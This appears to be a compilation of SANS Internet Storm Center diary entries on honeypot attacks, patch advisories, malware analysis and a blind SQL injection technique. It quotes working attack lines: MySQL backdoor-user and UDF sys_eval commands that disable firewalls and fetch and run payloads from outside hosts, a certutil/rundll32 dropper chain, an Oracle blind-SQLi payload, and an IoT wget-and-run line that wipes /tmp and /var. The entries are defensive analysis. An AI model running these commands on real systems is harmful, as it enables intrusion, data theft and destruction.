We had a mysql honeypot getting hit hard with this "exploit" recently. I am enclosing the word "exploit" in quotes as the MySQL server was configured to allow logging in without password.

Here are some of the highlights of what happened after the attacker logged in.

First, the attacker makes sure that the "root" user has all possible privileges:

GRANT ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DROP, EVENT, EXECUTE, FILE, INDEX, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER ON *.* TO 'root'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES

Next, a "backdoor" account, mysqld, is added. Interestingly, this is done first by inserting the user into the "mysql.user" table, then again using the create user and grant command.

insert into mysql.user(Host,User,Password) values("%","mysqld",password("654321*a")); CREATE USER 'mysqld'@'%' IDENTIFIED BY '654321*a'; GRANT ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DROP, EVENT, EXECUTE, FILE, INDEX, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER ON *.* TO 'mysqld'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;

Next, the attacker is degrading the security of our mysql install further, but allowing stored functioned to write data to binary logs:

set global log_bin_trust_function_creators=1

Of course, we may already be infected, so the attacker cleans up prior copies of the malicious code

DROP FUNCTION IF EXISTS lib_mysqludf_sys_info
DROP FUNCTION IF EXISTS sys_get
DROP FUNCTION IF EXISTS sys_set
DROP FUNCTION IF EXISTS sys_exec

Then, a set of files is written to "/usr/lib/mysql/plubin". This directory *should* be write protected to the mysql user, so this should not work in most installs.

select unhex('7F454C4602010100...000000') into dumpfile '/usr/lib/mysql/plugin/XXSIlX.so'

In case MySQL is properly configured, the same file is also written to /usr/lib/mysql and other locations. Then, the ".so" file (an ELF binary) is used to create a function.

CREATE FUNCTION sys_eval RETURNS string SONAME 'XXSIlX.so'

It turns out tht this function is essentially an "exec" that allows executing arbitrary system commands. The attacker will now use it to download additional code (I code errors trying to download the code now). Note that the code is downloaded from web servers that listen on various high ports, not port 80.

select sys_eval('/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cp /usr/bin/wget .;chmod +x wget;./wget -P ./dbms_temp http://game918.me:2545/websevrer;chmod 0755 ./dbms_temp/websevrer;./dbms_temp/websevrer;./wget -P ./db_temp http://222.186.15.76:58964/Tyrantudp;chmod 0755 ./db_temp/Tyrantudp;./db_temp/Tyrantudp;rm -rf wget;history -c;')

Probably the best "indicator of compromise" is the existence of the mysqld user. This user appears to be common to all the attempts I have seen recently. The file names for the .so files change. Also auditing functions that exist on your MySQL server will help. And PLEASE: Do not expose port 3306 on the internet and set a strong password or use certificates to authenticate.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Three years ago Johannes published a diary on Reserved IP Address Space with a complete list of reserved IPv4 address that obviously included the well-known as well as some new one such as RFC 6598 (released in April 2012) "[...] to accommodate the needs of Carrier-Grade NAT (CGN) devices."[1] The address space reserved for CGN is 100.64.0.0/10 which is used to counter the IPv4 address shortage by putting multiple hosts in a private subnet behind a public IP address.

Here is a simplified illustration of CGN:

If you are curious as to whether you carrier is using RFC 6598 CGN addresses, you can check your logs or traffic (packets) for 100.64.0.0/10.

[1] https://tools.ietf.org/html/rfc6598
[2] https://isc.sans.edu/forums/diary/Reserved+IP+Address+Space+Reminder/13228

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

The OpenSSL project team will be releasing OpenSSL version 1.0.2g and 1.0.1s on the 1 March 2016 that fixes several high severity vulnerabilities. They are also reminding everyone that version 1.0.1 will end 31st Dec 2016.

[1] https://mta.openssl.org/pipermail/openssl-announce/2016-February/000063.html

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

Wireshark released updates for version 1 and 2 which fixed several bugs and vulnerabilities. There were no new features added to either version. You can view the updates for version 1 here and version 2 here.

[1] https://www.wireshark.org/docs/relnotes/wireshark-1.12.10.html
[2] https://www.wireshark.org/docs/relnotes/wireshark-2.0.2.html
[3] https://www.wireshark.org/download.html

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

# wget http://dcid.me/ossec-packages/rootcheck-latest.tar.gz
# tar xzvf rootcheck-latest.tar.gz
# cd rootcheck*
# ./install.sh
# ./rootcheck

# ls -1 db
cis_debian_linux_rcl.txt
cis_rhel5_linux_rcl.txt
cis_rhel_linux_rcl.txt
rootkit_files.txt
rootkit_trojans.txt
system_audit_rcl.txt
win_applications_rcl.txt
win_audit_rcl.txt
win_malware_rcl.txt

# wget https://cisofy.com/files/lynis-2.1.1.tar.gz
# tar xzvf lynis-2.1.1.tar.gz
or (to get the latest code)
# git clone https://github.com/CISOfy/lynis 
# cd lynis
# ./lynis audit system

• File permissions
• Binary scans
• Testing for virtualized environments
• Running processes
• Boot procedure
• Kernel configuration
• Users, authentication
• File systems
• Shells
• Local firewalls
• Standard daemons settings (SNMP, Syslog, ...)

Here is small extracts of a generated report (they are usually very long):

[08:57:29] Test: Checking PermitRootLogin in /etc/ssh/sshd_config
[08:57:29] Result: Option PermitRootLogin found in /etc/ssh/sshd_config
[08:57:29] Result: Option PermitRootLogin value is  WITHOUT-PASSWORD
[08:57:29] Result: SSH option PermitRootLogin is configured reasonably
[08:57:29] Suggestion: Consider hardening of SSH configuration [test:SSH-7408] [details:PermitRootLogin (WITHOUT-PASSWORD --> NO)] [solution:-]
[08:57:29] Hardening: assigned 1 hardening points (max for this item: 3), current: 98, total: 154
...
[08:57:30] Performing test ID LOGG-2190 (Checking deleted files in file table)
[08:57:30] Test: checking deleted files but are still in use
[08:57:30] Result: found one or more files which are deleted, but still in use
[08:57:30] Found deleted file: /tmp/tmpfHXNnZp
[08:57:30] Found deleted file: /var/log/upstart/docker.log.1
[08:57:30] Suggestion: Check what deleted files are still in use and why. [test:LOGG-2190] [details:-] [solution:-]
...
[08:57:31] Performing test ID BANN-7126 (Check issue banner file contents)
[08:57:31] Test: Checking file /etc/issue contents for legal key words
[08:57:31] Result: Found only 0 key words (5 or more suggested), to warn unauthorized users and could be increased
[08:57:31] Suggestion: Add a legal banner to /etc/issue, to warn unauthorized users [test:BANN-7126] [details:-] [solution:-]
...
[08:57:31] Performing test ID CONT-8104 (Checking Docker info for any warnings)
[08:57:31] Test: Check for any warnings
[08:57:46] Result: found warning(s) in output
[08:57:46] Output: No swap limit support
[08:57:46] Suggestion: Run 'docker info' to see warnings applicable to Docker daemon [test:CONT-8104] [details:-] [solution:-]
...
[08:57:47] Binary: found /usr/bin/gcc (world executable)
[08:57:47] Hardening: assigned 2 hardening points (max for this item: 3), current: 151, total: 244
[08:57:47] Result: at least one compiler could be better hardened by restricting executable access to root or group only
[08:57:47] Suggestion: Harden compilers like restricting access to root user only [test:HRDN-7222] [details:-] [solution:-]

Yesterday, Palo Alto Networks released an update to PAN-OS, which addresses five different vulnerabilities [1]. The security researcher who identified the vulnerabilities will publish details about these issues at a conference on March 16th. You MUST patch affected systems before that date.

Two of the vulnerabilities appear to be in particular dangerous, and affected devices should be patched immediately.

Unauthenticated Buffer Overflow in GlobalProtect/SSL VPN Web Interface (PAN-SA-2016-0005)

This issue affects PAN's SSL VPN, which implies that it will be difficult to limit traffic to the GlobalProtect portal to "trusted IPs". An SSL VPN like this is often used to allow users from untrusted networks to connect to internal resources. 

Unauthenticated Command Injection in Management Web Interface (PAN-SA-2016-0003)

All too often, web-based APIs do not use the same rigor to provide authentication as we find it in web applications they support. This appears to be another case where a particular API function was left unguarded, and arbitrary commands may be executed. However, this vulnerability only affects the management web interface, which should not be "wide open" and access should be limited to carefully selected IP address ranges. Exploits like CSRF may on the other hand still be used to trick users at an authorized workstation to send an exploit to the device. We don't know enough about the vulnerability to understand if this is possible or not.

[1] https://securityadvisories.paloaltonetworks.com

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

# file faktura.rar
faktura.rar: ACE archive data version 20, from Win/32, version 20 to extract, contains AV-String (unregistered), solid

%windir%\system32\cmd.exe /V:ON /c dir %TEMP%\faktura.lnk /s /b >%TEMP%\bwTFO && 
set /p k=<%TEMP%\bwTFO &&
findstr TVqQAA !k!>%TEMP%\bwTFO && 
certutil -decode %TEMP%\bwTFO %TEMP%\bwTFO.dll && 
del %TEMP%\bwTFO !k! && 
rundll32 %TEMP%\bwTFO.dll,PHojcLeWFaI YEfM

00000740  a3 41 5d 34 0c e0 a5 4d  97 35 a3 e4 11 bd 29 00  |.A]4...M.5....).|
00000750  50 56 38 75 73 00 00 00  00 0d 0a 54 56 71 51 41  |PV8us......TVqQA|
00000760  41 4d 41 41 41 41 45 41  41 41 41 2f 2f 38 41 41  |AMAAAAEAAAA//8AA|
00000770  4c 67 41 41 41 41 41 41  41 41 41 51 41 41 41 41  |LgAAAAAAAAAQAAAA|
00000780  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000007a0  41 41 41 41 41 41 41 41  41 41 41 75 41 41 41 41  |AAAAAAAAAAAuAAAA|
000007b0  41 34 66 75 67 34 41 74  41 6e 4e 49 62 67 42 54  |A4fug4AtAnNIbgBT|
000007c0  4d 30 68 56 47 68 70 63  79 42 77 63 6d 39 6e 63  |M0hVGhpcyBwcm9nc|
000007d0  6d 46 74 49 47 4e 68 62  6d 35 76 64 43 42 69 5a  |mFtIGNhbm5vdCBiZ|
000007e0  53 42 79 64 57 34 67 61  57 34 67 52 45 39 54 49  |SBydW4gaW4gRE9TI|
000007f0  47 31 76 5a 47 55 75 44  51 30 4b 4a 41 41 41 41  |G1vZGUuDQ0KJAAAA|
00000800  41 41 41 41 41 43 48 6f  38 76 62 77 38 4b 6c 69  |AAAAACHo8vbw8Kli|
00000810  4d 50 43 70 59 6a 44 77  71 57 49 50 2b 4b 33 69  |MPCpYjDwqWIP+K3i|
00000820  4d 4c 43 70 59 67 45 78  4b 4f 49 77 73 4b 6c 69  |MLCpYgExKOIwsKli|
00000830  45 33 64 74 6f 6a 43 77  71 57 49 55 6d 6c 6a 61  |E3dtojCwqWIUmlja|
00000840  4d 50 43 70 59 67 41 41  41 41 41 41 41 41 41 41  |MPCpYgAAAAAAAAAA|
00000850  46 42 46 41 41 42 4d 41  51 55 41 4b 53 54 4b 56  |FBFAABMAQUAKSTKV|
00000860  67 41 41 41 41 41 41 41  41 41 41 34 41 41 4f 49  |gAAAAAAAAAA4AAOI|
00000870  51 73 42 42 51 77 41 44  41 41 41 41 41 67 41 41  |QsBBQwADAAAAAgAA|
00000880  41 41 41 41 41 41 41 45  41 41 41 41 42 41 41 41  |AAAAAAAEAAAABAAA|
00000890  41 41 67 41 41 41 41 41  41 41 51 41 42 41 41 41  |AAgAAAAAAAQABAAA|
000008a0  41 41 43 41 41 41 45 41  41 41 41 41 41 41 41 41  |AACAAAEAAAAAAAAA| 

You can see immediately that the code is BASE64 encoded and can be extracted quite easily:

# strings faktura.lnk | grep TVqQAA | base64 -d - >malicious.bin
# file malicious.bin
malicious.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

VMware issued yesterday the following security advisory: VMSA-2016-0002 [1]. It addresses the CVE-2015-7547 [2] (getaddrinfo() in glibc) which affects the following products:

• VMware ESXi 5.5 without patch ESXi550-201602401-SG
• VMware virtual appliances

Note that a patch is still pending for ESXi 6.0.

[1] http://www.vmware.com/security/advisories/VMSA-2016-0002.html
[2] https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7547

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key

​

[alexa_5000]
filename = top-5000.csv
case_sensitive_match = false
match_type = WILDCARD(domain)

sourcetype=squid | top uri_host | lookup alexa_5000 domain as uri_host

index=malwares eventtype="fe" (category="infection-match" OR category="malware-object") cs6=* 
| rex field=cs6 "~~Host:\s(?.*?)::~~" 
| dedup reURL 
| lookup top_5000 domain as reURL OUTPUTNEW 
| table reURL

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key

Have you analyzed malicious Office documents with VBA macros? Did they contain a userform? Like this (MD5 4e0c55054c4f7c32aece5cfbbea02846):

Then take a look at the content of the stream with a name that ends with /o:

You can see that it contains a URL.

Sometimes you will analyze the VBA code of malicious documents, but not find the URL. That's because the URL is stored as a property of a userform. The name of the property can be found in the stream with the name that ends with /f:

You can find this property back in the VBA code:

Didier Stevens
SANS ISC Handler
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com
IT Security consultant at Contraste Europe.

Yesterday, Wayne Smith submitted a sample (MD5 F1F31B18259DC9768D8B6132E543E3EE) to the ISC. Xavier, handler on duty, analyzed the (malicious) JavaScript in his sandbox, but it failed with an error. As I wrote in a previous diary, if malware malfunctions, you can still use static analysis.

Here is the script:

The expression I labeled 1 is a list of strings. The last string has a method call (e.()). This String method is defined farther down in the script: look at the function definition I labeled 2. Method e() returns the first character of the string to which it is applied. So the expression ('office', 'modal', 'dialect', '\u0074informer'.e()) can be replace with expression ('office', 'modal', 'dialect', '\u0074'), or ('office', 'modal', 'dialect', 't'). When a list is evaluated in JavaScript, it evaluates to its last emelent. So the expression finally becomes 't'. You can see that this script contains many expressions similar to the one I just reduced: this is the kind of string obfuscation used in this sample.

So what I would like to do is replace each expression with the character it evaluates to. Python has an interesting function I want to use in this case: re.sub. re.sub takes a regular expression and applies it to a given string. For each match in the string, it will replace the matched character sequence with a string or (and this is what I need) the return value of a function that is called for each match. So I can write a regular expression that will match strings like ('office', 'modal', 'dialect', '\u0074informer'.e()), and then write a function that will evaluate this expression (to 't' in this case). I won't write a Python program from scratch to do this, but I will use my translate.py tool. Here is the Python code (decode-1.py) I will use:

import re

def DecodeExpresssion(oMatch):
    return "'" + chr(int(oMatch.group(1), 16)) + "'"

def Decode(data):
    return re.sub(r"\([^\\\(]+\\u([0-9a-f]{4})[a-z]+'\.e\(\)\)", DecodeExpresssion, data)

 

Function Decode does the re.sub call with the regular expression and DecodeExpression function:

This translates the expressions as we wanted, expect for one: ('sabotage', 'arctic', 'special', 'minimal', 'gram(me)', 'memorial', '\u0045international'.e()). Our translation failed for this expression, because my regular expression is not designed to match words that contain parentheses: 'gram(me)'. In stead of trying to design a regular expression that will also match this expression, we can just remove the parentheses: gramme.

If you look closely, you will see some keywords and maybe a URL. But to make it easier to read, we will concatenate the string expressions with this Python script (decode-2.py):

import re

def DecodeExpresssion(oMatch):
    return "'" + eval(oMatch.group(0)) + "'"

def Decode(data):
    return re.sub(r"('[^']*' \+ )+'[^']*'", DecodeExpresssion, data)

Now you can clearly see the URL, but let's add a newline after each semi-colon (;) to make the script a bit more readable:

I downloaded this Locky sample with the deobfuscated URL: MD5 91d8ab08a37f9c26a743380677aa200d

Didier Stevens
SANS ISC Handler
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com
IT Security consultant at Contraste Europe.

$ vol.py -f memory.dump --profile=Win7SP1x86 psxview
Offset(P)  Name                    PID pslist psscan thrdproc pspcdid csrss
---------- -------------------- ------ ------ ------ -------- ------- -----
0x06541da0 svchost.exe            1140 True   True   False    True    True
​0x06531b10 wuauclt.exe            1040 True   True   False    True    True
​0x065e44d8 svchost.exe             952 True   True   False    True    True
...
...

• As its name suggests, It captures PE files (executables, DLL, drivers) loaded in the system and saves a copy of the file in a specific directory (the file name is the MD5 hash)
• It logs the executables names, MD5 hashes and the execution timestamp in a flat file.

C:\PECaptureSvc\Intercepted\[hostname]\[dd-mm-yyyy]\

C:\PECaptureSvc\Logs\[hostname]\[dd-mm-yyyy].log

18/02/2016 20:45:33
C:\totalcmd\TOTALCMD64.EXE
​80F48C1F435FE040D33665030F719132

C:\MySafeTools\*.exe
​*:\CorporateTool.exe

18/02/2016 20:46:20
C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSOXEV.DLL
2403A9F058DFDD337CE9A67AE1ECAD63

18/02/2016 21:03:46
C:\Program Files (x86)\WinRAR\RarExt64.dll
C2CE5E4DF7B3766A7A59A6634F29ABB1

18/02/2016 21:05:29
C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
4E7782C13D82BAA36059745280135A84

18/02/2016 21:05:35
C:\Program Files (x86)\Microsoft Office\Office12\WWLIB.DLL
C102BEDBE15445AA2938EBF0D5B281E0

18/02/2016 21:05:38
C:\Program Files (x86)\Microsoft Office\Office12\OART.DLL
7F2C8065F1079D04BD8BC2B19750A596

18/02/2016 21:05:42
C:\Program Files (x86)\Common Files\microsoft shared\OFFICE12\MSO.DLL
E7AAFC1A321ED0E3EF44B1ED8CF09FA2

18/02/2016 21:05:42
C:\Program Files (x86)\Microsoft Office\Office12\1033\WWINTL.DLL
BEF1EAD605CF791FDBB48ADD71075509

18/02/2016 21:05:42
C:\Program Files (x86)\Common Files\microsoft shared\OFFICE12\MSPTLS.DLL
34B820CE0B0A26CFAF78F6E57709FFB7

18/02/2016 21:05:44
C:\Program Files (x86)\Common Files\microsoft shared\OFFICE12\MSORES.DLL
C7D010BD8BCEF2EB3FCA8F7CD3C08D9F

18/02/2016 21:05:46
C:\Program Files (x86)\Common Files\microsoft shared\OFFICE12\1033\MSOINTL.DLL
4C5D603A632023BFDB8EDD4436882ABF

18/02/2016 21:05:47
C:\Program Files (x86)\Common Files\microsoft shared\OFFICE11\msxml5.dll
FC5CB6727354B634CD8AD3EFB4B8F83D

18/02/2016 21:05:47
C:\Windows\System32\spool\drivers\x64\3\PSCRIPT5.DLL
211A1CFF92CF7F70EB61606ABB729615

18/02/2016 21:05:47
C:\Windows\System32\spool\drivers\x64\3\PS5UI.DLL
9699DB0085C06D5E1D03089D88CA13B9

18/02/2016 21:05:47
C:\Program Files (x86)\Common Files\microsoft shared\OFFICE12\RICHED20.DLL
1A8B4857F2CAAED89E16B1ED1F24930D

18/02/2016 21:05:48
C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL
563482363CD86013E8EF29575D790D22

18/02/2016 21:05:48
C:\Program Files (x86)\Microsoft Office\Office12\msproof6.dll
DA79517783552B80229705D9720B8E8D

18/02/2016 21:05:48
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\msvcp80.dll
0B3595A4FF0B36D68E5FC67FD7D70FDC

18/02/2016 21:05:49
C:\Program Files (x86)\Common Files\microsoft shared\PROOF\MSLID.DLL
CB0C98DD5C3108F71BAA938B1ECD8B04

18/02/2016 21:05:49
C:\PROGRA~2\MICROS~3\Office12\OUTLFLTR.DLL
87BA0576429722DF5B92FD43F55FAD77

18/02/2016 21:05:49
C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\1033\VBE6INTL.DLL
B64D8A3F75C4AB72242910D9F4BBEB75

18/02/2016 21:05:49
C:\Windows\SysWOW64\SCP32.DLL
F0283069C1B8E0A65A97F08186BFC9B2

18/02/2016 21:05:49
C:\Windows\SysWOW64\FM20.DLL
7D5AD5FAF64BF8AA1EB55B81A3AB830D

18/02/2016 21:05:49
C:\Windows\SysWOW64\FM20ENU.DLL
F2CE3C8E63F770DB3E59D503CE4CC311

18/02/2016 21:07:40
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WMINet_Utils.dll
FDA2FEC6B42787EE1ED4EFD39359770B

18/02/2016 21:08:58
C:\Users\xavier\AppData\Local\Temp\vcgfdrDYa.exe
A9188E2204532498472F2E837C3D4A97

[pecapturesvc]
DATETIME_CONFIG =
NO_BINARY_CHECK = true
category = Operating System
description = PECaptureSVC Log File
pulldown_type = true

Introduction

On 2016-02-01, the Sucuri blog reported a spike in compromised WordPress sites generating hidden iframes with malicious URLs [1].  By 2016-02-02, I started seeing exploit kit (EK) traffic related to this campaign [2].  Sucuri noted that "admedia" was a common string used in malicious URLs generated by these iframes.  Because of that, some people (including me) use the term "admedia" when referring to traffic generated by this campaign.  These "admedia" URLs act as a gate between the compromised website and the EK server.  EK traffic associated with this campaign has generally sent TeslaCrypt ransomware.  However, characteristics of this campaign have evolved since Sucuri's original blog post.

• Since 2016-02-11, I've usually seen the term "megaadvertize" used in these gate URLs instead of "admedia" [3, 4, 5].
• Although we first saw Nuclear EK from this campaign, during the past week or so, these admedia gates have led to Angler EK.
• In the past 24 hours, I saw a Joomla site generate an admedia gate, so this campaign is no longer limited to WordPress sites.

Other sites like the Malwarebytes blog have also documented this campaign [6].  Sites like Malwarebytes and DeepEnd Research have also documented most of these recent changes [7, 8].  Let's look at a recent Angler EK infection related to this "admedia" campaign.  In today's example, the chain of events starts with a compromised Joomla site.

Shown above:  HTML from the compromised site that kicked off this chain of events.

Today's infection

On Wednesday 2016-02-17 at approximately 18:14 UTC, I got a full chain of events.  The chain started with a compromised website that generated an admedia gate.  The gate led to Angler EK.  Finally, Angler EK delivered TeslaCrypt, and we saw some callback traffic from the malware.

• 178.62.122.211 - img.belayamorda.info - admedia gate
• 185.46.11.113 - ssd.summerspellman.com - Angler EK
• 192.185.39.64 - clothdiapersexpert.com - TeslaCrypt callback traffic

Shown above:  A pcap of the infection traffic filtered in Wireshark.

Shown above:  Some of the events generated by reading the pcap in Snort 2.9.8.0 using the Talos subscription ruleset.

Shown above:  Some of the events generated in Sguil by using tcpreplay in Security Onion with Suricata and the EmergingThreats Pro ruleset.

Shown above:  The infected Windows desktop after Angler EK delivered TeslaCrypt.

Details

How did the compromised website generate the admedia gate?  It was caused by injected script.  As the Sucuri blog already reported, each .js file returned by the compromised site had malicious script appended to it.  In a case on 2016-02-15, I also saw the same type of script included in an HTML page from the compromised website [5]; however, today's traffic only shows injected script in the .js files.

Shown above:  Example of malicious script appended to .js files sent by the compromised web server (1 of 3).

Shown above:  Example of malicious script appended to .js files sent by the compromised web server (2 of 3).

Shown above:  Example of malicious script appended to .js files sent by the compromised web server (3 of 3).

Each example of injected script has a long string of hexadecimal code.  Translate that string from hex to ASCII, and you'll find a URL for the admedia gate.

Shown above:  The ASCII translation of that long hex string.  The admedia gate is highlighted in yellow.

In the traffic, an HTTP GET request to the admedia gate is followed by an HTTP POST.  The HTTP POST returns more obfuscated script.  That script generates a URL for an Angler EK landing page.  How can we check this?  Notice the "eval" function highlighted in the image below of HTML text returned by the admedia gate.

Shown above:  HTML and javascript returned by the admedia gate.

Take that HTML text and put it in a text editor.  Change the "eval" to "alert" and save that text to a separate HTML file.

Shown above:  Changing the "eval" to "alert" and saving the text in a separate HTML file.

Open your newly-saved HTML file in a browser, and you should see the Angler EK landing page URL appear in a pop-up alert.

Shown above:  The Angler EK landing page URL in a pop-up alert.

Below are images of the Angler EK traffic from today's infection.

Shown above:  HTTP request for the Angler EK landing page.

Shown above:  HTTP request for the Angler EK Flash exploit.

Shown above:  HTTP request for the Angler EK malware payload.

Final words

So far, I've only seen TeslaCrypt from this admedia campaign.  In fact, I've seen a whole lot of TeslaCrypt lately, with little other ransomware from EK traffic.  For example, I last saw CryptoWall on 2016-02-05 [9].  Since then, I haven't noticed any CryptoWall.

However, my field of view is currently limited, and there's plenty of information on other types of ransomware that's been making the rounds lately [10, 11, and 12 to name a few].

Have you seen any admedia Angler EK or similar activity?  If so let us know in the comments section below.

Traffic and malware for this ISC diary can be found here.

---
Brad Duncan
Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection.html
[2] http://malware-traffic-analysis.net/2016/02/03/index.html
[3] http://malware-traffic-analysis.net/2016/02/11/index.html
[4] http://malware-traffic-analysis.net/2016/02/12/index2.html
[5] http://malware-traffic-analysis.net/2016/02/15/index.html
[6] https://blog.malwarebytes.org/exploits-2/2016/02/nuclear-ek-leveraged-in-large-wordpress-compromise-campaign/
[7] https://blog.malwarebytes.org/exploits-2/2016/02/wordpress-compromise-campaign-from-nuclear-ek-to-angler-ek/
[8] http://www.deependresearch.org/2016/02/jan-feb-2016-domains-associated-with.html
[9] http://www.malware-traffic-analysis.net/2016/02/05/index.html
[10] https://nakedsecurity.sophos.com/2016/02/17/locky-ransomware-what-you-need-to-know/
[11] https://www.grahamcluley.com/2016/02/padcrypt-ransomware-live-chat/
[12] http://www.bleepingcomputer.com/news/security/umbrecrypt-ransomware-manually-installed-via-terminal-services/

Google researchers Fermin J. Serna and Kevin Stadmeyer today released a blog post stating that they found a stack-based buffer overflow vulnerability in the getaddrinfo function in glibc. This is significant for a number of reasons:

• Pretty much any Linux system uses glibc, and getaddrinfo is typically used to resolve IP addresses. Which means Linux servers as well as workstations, are vulnerable unless it runs an old version of glibc (pre 2.9).
• Google isn't the first one that spotted the bug, but determined it's significance in collaboration with Redhat.
• Google was able to create a PoC exploit. While exploitation depends on the countermeasures systems use for stack based buffer overflows, it is possible to exploit the bug and achieve command execution.
  
  [earlier I mentioned iOS and Android as likely vulnerable. They could be, but they do not include glibc by default, so it would be up to an app to introduce it. Android uses the Bionic libc library.  OS X and iOS do not use glibc neither do other BSD based systems.  Thanks to Ken White for pointing this out]

The exploit will likely trigger a DNS lookup from a vulnerable system. DNS lookups can be triggered in many ways: An image embedded in a web page, an email sent that is processed by a spam filter (which involves DNS lookups) are just two of many options. 

The exploit response will exceed 2048 bytes in size. Not all responses > 2048 are exploits. The response may arrive via TCP or UDP. 

Many modern systems support a feature called "EDNS0". This feature can be used by a client to signal to a server that it is willing to receive UDP responses that are larger than the traditional 512 bytes in size. Features like DNSSEC require EDNS0 to be enabled. Blocking large DNS responses will likely break EDNS0. DNS resolution may fail or will be significantly delayed.

What can you do?

- Patch!
- make sure all systems on your network use a specific resolver and block outbound DNS unless it originates from this resolver (this is a good idea anyway!). This will limit exposure to the resolver
- the advisory has a number of different options available (note that while the bug appears to be related to IPv6 AAAA queries, disabling IPv6 will not mitigate the issue. The exploit payload may still include malicious content).

All versions of glibc after 2.9 are vulnerable. Version 2.9 was introduced in May 2008.

Affected / Not Affected Major Linux Distributions (work in progress)

[1] https://googleonlinesecurity.blogspot.ca/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html
[2] https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Although a lot has been written about SQL injection vulnerabilities, they can still be found relatively often. In most of the cases I’ve seen in last couple of years, I had to deal with blind SQL injection vulnerabilities. Typically, they can be exploited relatively easy, by carefully modifying the resulting SQL queries and deducing the answer – either by monitoring the resulting web page or, for example, by measuring the time it took for the answer to arrive.

Long time ago (phew, it’s been almost 7 years!) I wrote a diary where I gave an example of exploiting a blind SQL injection vulnerability that needed a specific value in a parameter (see https://isc.sans.edu/diary/Advanced+blind+SQL+injection+%28with+Oracle+examples%29/6409). In this particular case, the SQL query’s result had to be either true or false (literally) – by careful modification of the query this can be exploited to retrieve any data from the database (as long as the user we run as has permissions to access the required data, of course).

This time I stumbled upon a bit more difficult SQL injection. I was able to control a single parameter that was used in a SQL query through a request such as the one below:

http://10.10.10.10/application.aspx?queueID=743994

When the URL was opened regularly, in a browser, it was supposed to list certain transactions belonging to the numerical queueID in shown in the URL. The first issue was that the queueID I had to work with had no results! It just returned an empty page (and there was no Direct Object Reference here, I had to use that particular queueID).

What’s the problem you might say? Simply put 743994 OR 1=1 and off you go. Well, it wasn’t that easy – due to a complex SQL query in the backend, as well as application handling of the received data I did not manage to exploit it with such simple queries. A UNION didn’t work either – the application expected exactly certain values in the columns (not only column types) and all I could get with both of these cases was a nice, generic error screen (hey, no insufficient error handling either!).

The idea here was to prove that this is exploitable – and although it looks a bit more complex, it is certainly exploitable – here’s one way (if you have idea of other ways on how to exploit this please do share!).
So, to prove that there was a SQL injection vulnerability, the following two queries can satisfy our needs:

queueID = 743994 AND 1=1
queueID = 743994 AND 1=2
queueID = 743995
queueID = 743994’

The first 3 queries all return a no results page. The last one returns the generic error page due to the SQL error that happened in the background. A tough cookie.

As with any blind SQL injection vulnerability, we need a true/false cases. And if you take a look we actually have them: the true case can be the no results page, while the false case can be the error page. The only question that remains is how to provoke the error page – it’s easy to do manually by entering a ‘ character, but how to do it in SQL, programmatically?

Division by zero come to the rescue! If we divide something by zero, we can cause an SQL error, which will result with the generic error page.

Our exploitation now becomes the following:
queueID = 743994 AND 1 = 1 / (select case when substr(banner, 1, 1) = 'A' then 1 else 0 end from (select banner from v$version where banner like '%Oracle%'))

As in the previous diary, the query takes the database banner from v$version (where it has string Oracle in it). Then, from that line the first character is examined (specified by the substr() call) and compared to the letter 'A'. If it is 'A', the query returns 1, otherwise it returns 0. 

This will either result in 1 = 1 / 1 or 1 = 1 / 0. The former will display the no results page while the latter will display the error page. Game over!
In this particular case the goal was to show what an attacker can do with the vulnerability. While it was relatively easy to confirm its existence, by showing that arbitrary data can be retrieved from the database, the resulting risk indeed gets pretty high.

Have more ideas on how to exploit this? Let us know!

--
Bojan
@bojanz
INFIGO IS

Attackers have problems too: Attacks against "Internet of Things" (IoT) devices are simple (as in "log in..."), but the attacker never knows what kind of architecture they may hit. IoT devices often go beyond the standard x86 architecture we are used to on our servers and workstations. What I typically see is the attempt to launch multiple binaries, compiled for different architectures, to see "what runs".

For example, this was the "#1" malware in our honeypot today:

After logging in, the attacker is running the following commands (comments and linebreaks added)

rm -rf /tmp/* /var/*;  # clean out /tmp... ouch. /var ? that can break stuff. 
cd /tmp || cd /var/;   # cd to /tmp or /var, whatever is available.

# download via http, ftp or tftp . whatever works
wget http://149.202.242.80/t.sh; sh t.sh;  
